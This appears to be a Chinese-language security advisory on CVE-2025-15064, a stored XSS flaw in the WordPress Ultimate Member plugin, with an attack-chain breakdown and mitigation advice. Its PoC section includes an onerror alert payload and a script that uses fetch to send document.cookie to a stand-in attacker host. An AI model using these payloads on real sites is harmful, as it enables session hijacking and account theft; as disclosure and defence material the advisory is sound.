CVE-2025-15064 CVSS 6.4 中危

CVE-2025-15064: WordPress Ultimate Member插件存储型XSS漏洞

披露日期: 2026-04-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15064

漏洞类型

存储型跨站脚本攻击

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

The Ultimate Member WordPress Plugin

漏洞概述

WordPress插件Ultimate Member在2.11.1及之前版本中存在存储型XSS漏洞。该漏洞源于对用户描述字段的输入清理和输出转义不足。当Ultimate Member设置中开启“用户描述HTML支持”功能时，经过身份认证的攻击者（仅需订阅者权限）即可在个人资料描述中注入恶意Web脚本。一旦其他用户访问被注入的页面，恶意脚本将在其浏览器中执行，从而造成用户数据窃取或会话劫持等风险。

技术细节

该漏洞的成因在于Ultimate Member插件在处理用户资料更新请求时，未对“用户描述”字段进行充分的安全过滤。特别是在插件后台开启了“HTML support for user description”选项后，系统允许在该字段输入HTML标签。攻击者可利用低权限账号（如订阅者）登录，在编辑个人资料时向描述字段插入恶意的JavaScript代码（如通过事件触发器）。由于缺乏输出转义，这些恶意代码被持久化存储在数据库中。当管理员或其他用户浏览包含受损用户描述的页面（如成员目录）时，服务器直接输出未经过滤的HTML内容，导致受害者的浏览器解析并执行攻击者注入的脚本，进而实现存储型XSS攻击。

攻击链分析

STEP 1

侦察

攻击者确认目标站点使用了Ultimate Member插件，并检测"用户描述HTML支持"功能是否开启。

STEP 2

获取权限

攻击者注册或使用一个低权限账号（如订阅者Subscriber），该账号拥有编辑个人资料的权限。

STEP 3

注入Payload

攻击者在个人资料编辑页面的"用户描述"字段中输入包含JavaScript的恶意HTML代码，并提交保存。

STEP 4

持久化存储

由于插件未对输入数据进行有效的过滤和转义，恶意代码被存储在WordPress数据库的user meta表中。

STEP 5

触发执行

当管理员或其他用户访问成员目录或该用户的个人资料页面时，恶意脚本从数据库加载并在受害者浏览器中执行。

STEP 6

达成目标

恶意脚本执行后，攻击者可窃取受害者的Session Cookie、重定向页面或进行进一步的操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2025-15064 Stored XSS -->
<!-- Prerequisite: Enable "HTML support for user description" in Ultimate Member settings -->
<!-- Step 1: Log in as a subscriber (low privileged user). -->
<!-- Step 2: Navigate to the Profile edit page. -->
<!-- Step 3: Inject the following payload into the "Biography/Description" field and save. -->

<!-- Basic Payload -->
<img src=x onerror=alert(document.cookie)>

<!-- Advanced Payload (stealthy) -->
<script>
  fetch('http://attacker-server.com/steal?c=' + encodeURIComponent(document.cookie));
</script>

影响范围

Ultimate Member <= 2.11.1

防御指南

临时缓解措施

建议立即升级Ultimate Member插件至最新版本。若暂时无法升级，请务必在插件后台设置中关闭“用户描述HTML支持”功能，这能有效阻断该漏洞的利用途径。同时，管理员应审查现有的用户描述内容，清理可能存在的恶意脚本。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表